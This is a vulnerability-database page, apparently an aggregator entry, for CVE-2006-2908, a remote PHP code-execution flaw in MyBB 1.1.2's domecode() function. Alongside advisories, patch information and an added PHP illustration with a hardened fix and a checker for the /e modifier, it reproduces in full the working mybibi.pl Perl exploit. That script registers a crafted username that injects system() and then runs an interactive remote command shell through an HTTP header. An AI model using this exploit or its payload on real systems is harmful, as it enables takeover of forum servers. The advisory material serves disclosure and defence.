CVE-2006-2908
CVSS 7.5
Published: 2006-06-12 21:02:00
Revised: 2011-03-07 21:37:16

[Original] The domecode function in inc/functions_post.php in MyBulletinBoard (MyBB) 1.1.2, and possibly other versions, allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier.


[CNNVD] MyBB functions_post.php domecode() arbitrary code execution vulnerability (CNNVD-200606-269)

        MyBB is a popular web forum package.
        MyBB mishandles the username chosen at registration; a remote attacker can exploit this to run arbitrary PHP code, and through it arbitrary commands, on the server.
        At registration MyBB does not properly filter the username field, and inc/functions_post.php later concatenates the stored username into a preg_replace() call in domecode() that uses the "/e" (eval) modifier, so the username becomes PHP source rather than data. An attacker registers with a specially crafted username and then previews a post containing the "/slap" string, which causes the injected PHP code to run. Nothing beyond an ordinary, activated forum account is needed; the mybibi.pl exploit reproduced below registers that account itself.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2908
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-269
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/archive/1/436767/100/0/threaded
(PATCH)  BUGTRAQ  20060612 Secunia Research: MyBB "domecode()" PHP Code Execution Vulnerability
http://secunia.com/secunia_research/2006-40/advisory/
(VENDOR_ADVISORY)  MISC  http://secunia.com/secunia_research/2006-40/advisory/
http://secunia.com/advisories/20371
(VENDOR_ADVISORY)  SECUNIA  20371
http://www.vupen.com/english/advisories/2006/2288
(UNKNOWN)  VUPEN  ADV-2006-2288
http://www.securityfocus.com/bid/18396
(UNKNOWN)  BID  18396
http://www.securityfocus.com/archive/1/archive/1/437509/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060613 Proof of concept: mybb 1.1.2 remote code execution
http://www.osvdb.org/26216
(UNKNOWN)  OSVDB  26216
http://www.514.es/download/mybibi.pl
(UNKNOWN)  MISC  http://www.514.es/download/mybibi.pl
http://securitytracker.com/id?1016270
(UNKNOWN)  SECTRACK  1016270
http://xforce.iss.net/xforce/xfdb/27046
(UNKNOWN)  XF  mybb-domecode-code-execution(27046)
http://securityreason.com/securityalert/1086
(UNKNOWN)  SREASON  1086

- Vulnerability information

MyBB functions_post.php domecode() arbitrary code execution vulnerability
High risk   Input validation
2006-06-12 00:00:00 2006-10-05 00:00:00
Remote
        MyBB is a popular web forum package.
        MyBB mishandles the username chosen at registration; a remote attacker can exploit this to run arbitrary PHP code, and through it arbitrary commands, on the server.
        At registration MyBB does not properly filter the username field, and inc/functions_post.php later uses that input in a preg_replace() call in domecode() that carries the "/e" modifier. An attacker registers with a specially crafted username and then previews a post containing the "/slap" string, which causes arbitrary PHP code to execute.
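The mechanism described above (and again in the Secunia advisory and the OSVDB entry further down) is easy to misread as a regex problem; it is an eval problem. The following PHP is an added example, not MyBB's own code and not from any of the advisories on this page: it builds the replacement string that a /e preg_replace() would hand to eval() for the username mybibi.pl registers, shows the preg_replace_callback() form that removes the eval, and adds a small token-based check for /e patterns in a source tree. The "/slap" regex, the trout text, the variable names and the sample source are assumptions for the example; the vulnerable string is only displayed, never evaluated, because the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0.

```php
<?php
declare(strict_types=1);
// Added illustration; not MyBB's code. The "/slap" regex, the trout text and
// the variable names are assumed, since the page does not reproduce domecode().

// Constructed attacker username, the same shape mybibi.pl registers: it closes
// the single-quoted string the replacement is built from, inserts a system()
// call on an attacker-controlled request header (PHP exposes "C: cmd" as the
// environment variable HTTP_C), then re-opens the string so the code stays valid.
const EVIL_USERNAME = "'.system(getenv(HTTP_C)).'";

// (1) Vulnerable pattern. With the /e modifier preg_replace() substitutes the
// back-references into the replacement string and then eval()s it as PHP, so a
// username concatenated into that string is source code, not data. /e was
// deprecated in PHP 5.5 and removed in 7.0, so this only builds the string.
function vulnerable_replacement(string $username): string
{
    return "'<em>* " . $username . " slaps \\1 around a bit with a large trout</em>'";
}

// (2) Hardened form. preg_replace_callback() evaluates nothing: the username
// and the back-reference are plain strings inside the closure, and both are
// HTML-escaped before they reach the rendered post.
function domecode_safe(string $message, string $username): string
{
    return preg_replace_callback(
        '#^/slap (.*)$#i',
        static function (array $m) use ($username): string {
            return '<em>* ' . htmlspecialchars($username, ENT_QUOTES, 'UTF-8')
                . ' slaps ' . htmlspecialchars($m[1], ENT_QUOTES, 'UTF-8')
                . ' around a bit with a large trout</em>';
        },
        $message
    );
}

// (3) Check for a code base: preg_replace() calls whose literal pattern carries
// the /e modifier. Token-based, so mentions in comments do not count, but it
// only inspects a literal first argument (a pattern held in a variable is missed).
function find_eval_modifier(string $source): array
{
    $hits   = [];
    $tokens = token_get_all($source);
    $n      = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        if (!is_array($t) || $t[0] !== T_STRING || strtolower($t[1]) !== 'preg_replace') {
            continue;
        }
        for ($j = $i + 1; $j < $n; $j++) {            // first string literal = pattern
            if ($tokens[$j] === ')' || $tokens[$j] === ';') {
                break;                                 // no literal pattern
            }
            if (!is_array($tokens[$j]) || $tokens[$j][0] !== T_CONSTANT_ENCAPSED_STRING) {
                continue;
            }
            $pattern = (string) substr($tokens[$j][1], 1, -1);  // strip the PHP quotes
            if ($pattern === '') {
                break;
            }
            $delim = $pattern[0];
            $close = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'][$delim] ?? $delim;
            $end   = strrpos($pattern, $close);
            if ($end !== false && strpos(substr($pattern, $end + 1), 'e') !== false) {
                $hits[] = ['line' => $tokens[$j][2], 'pattern' => $pattern];
            }
            break;
        }
    }
    return $hits;
}

// Demonstration ---------------------------------------------------------------
echo "Code that /e would eval() for the crafted username:\n  ",
    vulnerable_replacement(EVIL_USERNAME), "\n\n";
echo "Hardened output for the same username:\n  ",
    domecode_safe('/slap Bob', EVIL_USERNAME), "\n\n";

// Constructed sample source: one /e call and one harmless /i call.
$sample = <<<'SRC'
<?php
$m = preg_replace("#^/slap (.*)#ie", "'<em>* " . $user . " slaps \\1</em>'", $m);
$m = preg_replace('#\r\n#i', "\n", $m);
SRC;
foreach (find_eval_modifier($sample) as $hit) {
    printf("line %d: /e modifier in pattern %s\n", $hit['line'], $hit['pattern']);
}
```

Run it with `php example.php`. The first line of output is the PHP expression that /e would evaluate, with the attacker's `system(getenv(HTTP_C))` sitting between two string fragments exactly as the exploit intends; the hardened output shows the same username rendered as inert, escaped text. The checker goes beyond the page's single case: it flags any preg_replace() whose literal pattern ends in a modifier set containing `e`, which is the audit to run after a bug of this class, while patterns kept in variables or assembled at run time still need a manual look.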

- Advisory and patch

        The vendor has released an upgrade that fixes this issue; download it from the vendor's site:
        http://www.mybboard.com/downloads.php

- Vulnerability information (1909)

MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit (EDBID:1909)
php webapps
2006-06-13 Verified
Javier Olascoaga
#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flooding my inbox!
#
# - First you need to create the special user. To do this use:
#	./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   This step needs a graphic confirmation (CAPTCHA), so the exploit writes
#   the image to /tmp/file.png; look at it and type the text at the prompt.
#   If everything is OK, you'll have a new valid user.
# * The exploit writes the registration response to mybibi_out.html for
#   debugging.
# - After you have created the user, or if you already have a valid user with
#   the crafted username, you can execute shell commands.
#
# TIPS:
#	* Sometimes you have to change the forum id: --tid is your friend ;)
#	* Don't forget to change the email. You MUST activate the account.
#	* Better karate is still inside you.
#
# LIMITATIONS:
#	* If the admin has set the maximum username length below 28 characters,
#	  this exploit doesn't work (the crafted username is 28 characters long).
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request;
use HTTP::Request::Common "POST";
use Getopt::Long;

$| = 1;   # unbuffered output, so the prompt shows up immediately

# user config.
my $uservar  = "C"; # request header that carries the command; don't use long names.
my $password = "514r0x";
my $email    = "514\@mailinator.com";

my ($proxy, $proxy_user, $proxy_pass);
my ($host, $debug, $dir, $command, $del, $first_time);
my ($logged, $tid) = (0, 2);   # $tid is the forum id (fid) to post in

# The crafted username. domecode() concatenates the username into a
# preg_replace() replacement that is evaluated with the /e modifier, so the
# quotes close that string, system() runs the value of the HTTP_C request
# header (PHP exposes "C: cmd" as the environment variable HTTP_C), and the
# trailing quote re-opens the string so the generated PHP stays valid.
# Exactly 28 characters: '.system(getenv(HTTP_C)).'
my $username = "'.system(getenv(HTTP_" . $uservar . ")).'";

GetOptions(
  'host=s'       => \$host,
  'dir=s'        => \$dir,
  'proxy=s'      => \$proxy,
  'proxy_user=s' => \$proxy_user,
  'proxy_pass=s' => \$proxy_pass,
  'debug'        => \$debug,
  '1'            => \$first_time,
  'tid=s'        => \$tid,
  'delete'       => \$del,     # accepted but unused
) or help();

help() unless $host; # please don't try this at home.

$dir = "/" unless $dir;
$dir =~ s{/+$}{};                # avoid "dir//member.php"
$host = "http://" . $host if $host !~ /^http/;
print "$host - $dir\n";

my $ua = LWP::UserAgent->new(cookie_jar => { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
# The original called proxy_authorization_basic() on a request object that
# did not exist yet; put the header in the agent's defaults instead.
$ua->default_headers->proxy_authorization_basic($proxy_user, $proxy_pass)
    if $proxy_user;
# Replaces LWP::Debug::level('+'), which modern libwww-perl no longer provides.
$ua->add_handler(request_send => sub { print shift->as_string, "\n"; return })
    if $debug;

create_user() if $first_time;

# Interactive shell: every line typed is sent in the "C:" header and executed
# by system() on the server when MyBB previews the post.
while (1) {
	login() if !$logged;

	print "mybibi> ";
	last unless defined($command = <STDIN>);   # EOF: stop instead of looping forever
	chomp $command;
	next if $command eq '';
	run_cmd($command);
}

unlink "$$.cookie";
exit 0;

# Named run_cmd rather than send() so it does not shadow Perl's builtin send().
sub run_cmd {
	my $cmd = shift;
	my $h = $host . $dir . "/newthread.php";
	my $req = POST $h, [
		'subject'     => '514',
		'message'     => '/slap 514',       # the /slap MyCode path reaches domecode()
		'previewpost' => 'Preview Post',    # preview is enough; the thread is never saved
		'action'      => 'do_newthread',
		'fid'         => $tid,
		'posthash'    => 'e0561b22fe5fdf3526eabdbddb221caa'
	];
	$req->header($uservar => $cmd);
	print $req->as_string() if $debug;
	my $res = $ua->request($req);
	if ($res->content =~ /You may not post in this/) {
		print "[!] No permission to post here. Change the forum id (--tid)\n";
	} else {
		# system() output is echoed before MyBB's own HTML, so print
		# everything up to the DOCTYPE.
		my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
		print defined $data ? $data : "[!] no output; check the login and --debug\n";
	}
}

sub login {
	my $h = $host . $dir . "/member.php";
	my $req = POST $h, [
		'username' => $username,
		'password' => $password,
		'submit'   => 'Login',
		'action'   => 'do_login'
	];
	my $res = $ua->request($req);
	if ($res->content =~ /You have successfully been logged/is) {
		print "[*] Login successful!\n";
		$logged = 1;
	} else {
		print "[!] Login failed (is the account activated?)\n";
	}
}

sub help {
    print "Syntax: $0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user {
	# First we need to get the CAPTCHA image.
	my $h = $host . $dir . "/member.php";
	print "Host: $h\n";

	my $req = HTTP::Request->new(GET => $h . "?action=register");
	my $res = $ua->request($req);

	$req = POST $h, [
		'action' => "register",
		'agree'  => "I Agree"
	];
	print $req->as_string() if $debug;
	$res = $ua->request($req);

	# Take the last image.php?action=... reference on the registration form.
	my ($img) = $res->content =~ m/.*(image\.php\?action.*?)"/is;
	die "[!] Registration image not found; re-run with --debug\n" unless defined $img;
	$req = HTTP::Request->new(GET => $host . $dir . "/" . $img);
	$res = $ua->request($req);
	print $req->as_string() if $debug;

	if ($res->content) {
		open(my $tmp, '>', '/tmp/file.png') or die $!;
		binmode $tmp;
		print $tmp $res->content;
		close $tmp;
		print "[*] /tmp/file.png created.\n";
	}

	my ($hash) = $img =~ m/hash=(.*?)$/;
	my $img_str = get_img_str();
	unlink('/tmp/file.png');
	$img_str =~ s/\n//g;
	$req = POST $h, [
		'username'     => $username,
		'password'     => $password,
		'password2'    => $password,
		'email'        => $email,
		'email2'       => $email,
		'imagestring'  => $img_str,
		'imagehash'    => $hash,
		'allownotices' => 'yes',
		'receivepms'   => 'yes',
		'pmpopup'      => 'no',
		'action'       => "do_register",
		'regsubmit'    => "Submit Registration"
	];
	print $req->as_string() if $debug;
	$res = $ua->request($req);

	open(my $out, '>', 'mybibi_out.html') or die $!;
	print $out $res->content;
	close $out;

	print "Check $email for confirmation, or mybibi_out.html if there is an error\n";
}

sub get_img_str {
	print "\nNow I need the text shown in /tmp/file.png: ";
	my $str = <STDIN>;
	return defined $str ? $str : '';
}

# milw0rm.com [2006-06-13]

- Vulnerability information (F47417)

mybibi_pl.txt (PacketStormID:F47417)
2006-06-15 00:00:00
Javier Olascoaga
exploit,proof of concept
CVE-2006-2908

Proof of concept exploit for MyBB version 1.1.2 that makes use of a flaw where user input is not properly sanitized.

The script is the same mybibi.pl listed under EDB-1909 above.

- Vulnerability information (F47405)

secunia-mybb.txt (PacketStormID:F47405)
2006-06-15 00:00:00
Andreas Sandblad  secunia.com
advisory,arbitrary,php
CVE-2006-2908

Secunia Research has discovered a vulnerability in MyBB, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the username field when registering is not properly sanitized before being used in a "preg_replace" call with the "e" modifier in the "domecode()" function in inc/functions_post.php. This can be exploited to execute arbitrary PHP code by first registering with a specially crafted username and then previewing a post containing the "/slap" string. The vulnerability has been confirmed in version 1.1.2. Prior versions may also be affected.

======================================================================

                     Secunia Research 12/06/2006

         - MyBB "domecode()" PHP Code Execution Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

MyBB 1.1.2

Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  Remote

======================================================================
3) Vendor's Description of Software

MyBB is a powerful, efficient and free forum package developed in PHP 
and MySQL. MyBB has been designed with the end users in mind, you and 
your subscribers. Full control over your discussion system is 
presented right at the tip of your fingers, from multiple styles and 
themes to the ultimate customisation of your forums using the 
template system.

Product link:
http://www.mybboard.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in MyBB, which can be 
exploited by malicious people to compromise a vulnerable system.

Input passed to the username field when registering isn't properly 
sanitised before being used in a "preg_replace" call with the "e" 
modifier in the "domecode()" function in inc/functions_post.php. This 
can be exploited to execute arbitrary PHP code by first registering 
with a specially crafted username and then previewing a post 
containing the "/slap" string.

The vulnerability has been confirmed in version 1.1.2. Prior versions 
may also be affected.

======================================================================
5) Solution

Update to version 1.1.3.
http://www.mybboard.com/downloads.php

======================================================================
6) Time Table

06/06/2006 - Initial vendor notification.
06/06/2006 - Vendor confirms vulnerability.
12/06/2006 - Public disclosure.

======================================================================
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-2908 for the vulnerability.

======================================================================
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-40/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================


- Vulnerability information

26216
MyBulletinBoard (MyBB) Registration username Field domecode() Function PHP Code Execution
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

MyBulletinBoard (MyBB) contains a flaw that allows remote PHP code execution. This flaw exists because the application does not validate input supplied to the domecode() function upon submission to the inc/functions_post.php script. Input passed to the username field when registering isn't properly sanitized before being used in a "preg_replace" call, which can be exploited by registering with a specially crafted username and then previewing a post containing the "/slap" string.

- Timeline

2006-06-12 Unknown
2006-06-13 Unknown

- Solution

Upgrade to version 1.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.


- Vulnerability information

MyBB DomeCode Remote PHP Script Code Injection Vulnerability
Input Validation Error   Bugtraq ID 18396
Remote: Yes   Local: No
Published 2006-06-05 12:00:00   Updated 2006-06-13 04:41:00
Andreas Sandblad, Secunia Research is credited with the discovery of this vulnerability.

- Affected program versions

MyBulletinBoard MyBulletinBoard 1.1.2

- Unaffected program versions

MyBulletinBoard MyBulletinBoard 1.1.3

- Vulnerability discussion

MyBB is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.

MyBB version 1.1.2 is vulnerable to this issue; prior versions may also be affected.

- Exploit

This issue can be exploited through a web client.

- Solution

The vendor has released version 1.1.3 of MyBB to address this issue.


MyBulletinBoard MyBulletinBoard 1.1.2
